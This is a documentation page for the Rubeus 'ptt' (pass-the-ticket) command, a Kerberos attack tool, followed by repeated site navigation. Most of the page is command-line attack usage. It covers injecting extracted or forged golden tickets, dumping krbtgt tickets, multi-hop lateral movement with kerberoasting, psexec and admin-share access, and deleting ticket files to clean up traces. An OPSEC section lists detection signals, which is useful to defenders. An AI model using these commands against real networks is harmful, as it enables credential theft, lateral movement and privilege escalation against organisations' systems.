ptt

Pass-the-Ticket (PTT) is a fundamental technique for credential reuse in Kerberos environments, enabling the use of extracted or forged tickets without requiring password knowledge.

Overview

Pass-the-ticket (PTT) injects Kerberos tickets into logon sessions, enabling authentication to services using previously extracted or forged tickets. This technique bypasses traditional password-based authentication and is essential for lateral movement and privilege escalation.

Credential Reuse

Use extracted tickets without passwords

Session Targeting

Inject into current or specific sessions

Stealth Operations

Authenticate without triggering logon events

Injection Process

Ticket Validation

Verify ticket format and integrity before injection

Session Access

Access target logon session (current or specified LUID)

LSA Interaction

Interface with Local Security Authority for ticket storage

Cache Update

Store ticket in session credential cache

Authentication Ready

Ticket becomes available for service authentication

Syntax Variations

Basic Usage
Session Targeting
Workflow Integration

# Inject ticket from .kirbi file
Rubeus.exe ptt /ticket:C:\temp\admin.kirbi

# Inject with relative path
Rubeus.exe ptt /ticket:tickets\domain_admin.kirbi

# Inject multiple tickets
Rubeus.exe ptt /ticket:ticket1.kirbi
Rubeus.exe ptt /ticket:ticket2.kirbi

Required Parameters

ticket

string

required

Kerberos ticket to inject into the session

Show Supported Formats

File Path: Path to .kirbi file (absolute or relative)
Base64: Base64-encoded ticket data
Formats: Both TGT and TGS tickets supported

Optional Parameters

Hide Session Targeting

luid

string

Target specific logon session ID (requires elevation)

Show Common LUID Values

0x3e7: SYSTEM session (999 in decimal)
0x3e4: LOCAL SERVICE session
0x3e5: NETWORK SERVICE session
Higher values: User logon sessions

Ticket Types and Sources

Ticket Granting Tickets (TGTs)
Service Tickets (TGS)
Forged Tickets

Hide TGT Characteristics

Properties:

Provide access to request service tickets
Enable broad authentication capabilities
Typically have longer validity periods
Foundation for all service access

Sources:

Extracted from compromised systems
Forged golden tickets
Renewed expired tickets
Delegation-based extraction

# Inject extracted TGT
Rubeus.exe ptt /ticket:extracted_tgt.kirbi

# Inject forged golden ticket
Rubeus.exe ptt /ticket:golden_ticket.kirbi

# Test TGT functionality
Rubeus.exe asktgs /service:cifs/fileserver.corp.local /ptt

TGTs provide the most flexibility as they can be used to request any service ticket within their privilege scope.

Session Management

Current Session Operations
Cross-Session Operations
SYSTEM Session Access

Hide Default Behavior

Standard Operation:

Injects ticket into current user’s logon session
Requires no special privileges
Limited to current user context
Most common usage scenario

# Basic injection into current session
Rubeus.exe ptt /ticket:user_ticket.kirbi

# Verify injection
Rubeus.exe klist

# Test access
dir \\target.corp.local\share

Show Use Cases

Typical Scenarios:

Standard credential reuse
User-context lateral movement
Service access with current privileges
Testing extracted credentials

Response Format

Successful Injection
Injection Warnings
Error Scenarios

[*] Action: Import Ticket
[+] Ticket successfully imported!

[*] PAC Validation: SUCCESS
[*] Ticket Type: Service Ticket
[*] Target LUID: 0x12345
[*] Username: admin@CORP.LOCAL
[*] Domain: CORP.LOCAL
[*] LogonId: 0x12345

Import Status

string

Confirmation that ticket was successfully imported

PAC Validation

string

Validation status of Privilege Attribute Certificate

Show PAC Validation Results

SUCCESS: PAC validated correctly
WARNING: PAC validation issues (but still imported)
FAILED: PAC validation failed (ticket may not work)

Ticket Information

object

Details about the imported ticket

Show Ticket Details

Ticket Type: TGT or Service Ticket
Target LUID: Destination logon session
Username: Principal name from ticket
Domain: Authentication domain

Complete Integration Workflows

Ticket Acquisition

Obtain tickets through various methods:

# Extract from current system
Rubeus.exe dump /service:krbtgt /outfile:extracted.kirbi

# Extract via delegation
Rubeus.exe tgtdeleg /outfile:delegated.kirbi

# Monitor for new tickets
Rubeus.exe monitor /filteruser:admin

Ticket Injection

Inject acquired tickets into appropriate sessions:

# Inject into current session
Rubeus.exe ptt /ticket:acquired_ticket.kirbi

# Inject into specific session (if elevated)
Rubeus.exe ptt /ticket:admin_ticket.kirbi /luid:0x54321

Verification

Verify successful injection and test functionality:

# List current tickets
Rubeus.exe klist

# Describe injected ticket
Rubeus.exe describe /ticket:injected_ticket.kirbi

# Test service access
dir \\target.corp.local\c$

Service Usage

Use injected tickets for authentication:

# Access file shares
dir \\fileserver.corp.local\share

# Request additional service tickets
Rubeus.exe asktgs /service:http/webapp.corp.local

# Perform administrative tasks
psexec \\target.corp.local cmd

Operational Cleanup

Clean up traces when operations complete:

# Purge injected tickets
Rubeus.exe purge

# Verify cleanup
Rubeus.exe klist

# Remove ticket files
del *.kirbi

Advanced Usage Scenarios

Lateral Movement
Privilege Escalation
Persistence Operations

Hide Cross-System Authentication

# Extract TGT from System A
Rubeus.exe dump /service:krbtgt /outfile:admin_tgt.kirbi

# Transfer to System B and inject
Rubeus.exe ptt /ticket:admin_tgt.kirbi

# Access resources from System B
Rubeus.exe asktgs /service:cifs/fileserver.corp.local
dir \\fileserver.corp.local\admin_share

Show Multi-Hop Operations

# Hop 1: Initial system with user credentials
Rubeus.exe asktgt /user:user /password:pass /ptt

# Extract for transfer
Rubeus.exe dump /service:krbtgt /outfile:user_tgt.kirbi

# Hop 2: Intermediate system
Rubeus.exe ptt /ticket:user_tgt.kirbi
Rubeus.exe kerberoast /outfile:service_hashes.txt

# Hop 3: Final target with cracked service account
Rubeus.exe asktgt /user:svc_sql /password:cracked_pass /ptt

OPSEC Considerations

Detection Risk: Ticket injection can be monitored through various host-based and behavioral detection methods.

Detection Vectors
Evasion Techniques
Defensive Countermeasures

Hide Host-Based Detection

Process Monitoring:

Non-lsass.exe processes accessing LSA authentication packages
Use of sensitive APIs like LsaCallAuthenticationPackage()
Memory access patterns consistent with ticket injection
Process behavior analysis for credential manipulation

API Call Monitoring:

Unusual LSA function calls
Authentication package interactions
Memory access to LSASS process
System call patterns for ticket injection

Show Behavioral Analysis

Authentication Patterns:

Service access without corresponding authentication events
Unusual timing between authentication and resource access
Access to resources not typically used by the account
Cross-session authentication activities

Privilege Anomalies:

Low-privilege accounts accessing high-privilege resources
Service accounts performing interactive operations
Authentication outside normal business hours
Geographic or network location anomalies

Show Event Log Analysis

Windows Event Logs:

Missing expected logon events (4624)
Service access without TGT requests
Unusual authentication package usage
Cross-LUID operations requiring elevation

Kerberos Event Monitoring:

TGS usage without corresponding TGT acquisition
Unusual encryption types or ticket characteristics
Service access patterns inconsistent with user behavior

Troubleshooting

Show Common Issues

Access Denied Errors
Ticket Format Issues
Authentication Failures

Problem: Cannot inject into specific LUIDSolutions:

Verify current user has administrative privileges
Check if target LUID exists and is accessible
Try injecting into current session instead
Verify anti-malware isn’t blocking injection

# Check current privileges
whoami /priv

# Enumerate available sessions
Rubeus.exe logonsession

# Try current session injection
Rubeus.exe ptt /ticket:ticket.kirbi

Integration with Other Commands

Ticket Extraction

Use dump, tgtdeleg, or monitor to obtain tickets for injection

Ticket Forgery

Inject golden, silver, or diamond tickets after creation

Session Management

Combine with logonsession and currentluid for session targeting

Access Validation

Use klist and describe to verify injection and ticket properties

klist

List tickets in current or specified session

dump

Extract tickets for use with PTT

describe

Analyze ticket contents before injection

purge

Clear injected tickets from session

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

Overview

Credential Reuse

Session Targeting

Stealth Operations

Injection Process

Syntax Variations

Required Parameters

Optional Parameters

Ticket Types and Sources

Session Management

Response Format

Complete Integration Workflows

Advanced Usage Scenarios

OPSEC Considerations

Troubleshooting

Integration with Other Commands

Ticket Extraction

Ticket Forgery

Session Management

Access Validation

klist

dump

describe

purge

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

​Overview

Credential Reuse

Session Targeting

Stealth Operations

​Injection Process

​Syntax Variations

​Required Parameters

​Optional Parameters

​Ticket Types and Sources

​Session Management

​Response Format

​Complete Integration Workflows

​Advanced Usage Scenarios

​OPSEC Considerations

​Troubleshooting

​Integration with Other Commands

Ticket Extraction

Ticket Forgery

Session Management

Access Validation

​Related Commands

klist

dump

describe

purge

Overview

Injection Process

Syntax Variations

Required Parameters

Optional Parameters

Ticket Types and Sources

Session Management

Response Format

Complete Integration Workflows

Advanced Usage Scenarios

OPSEC Considerations

Troubleshooting

Integration with Other Commands

Related Commands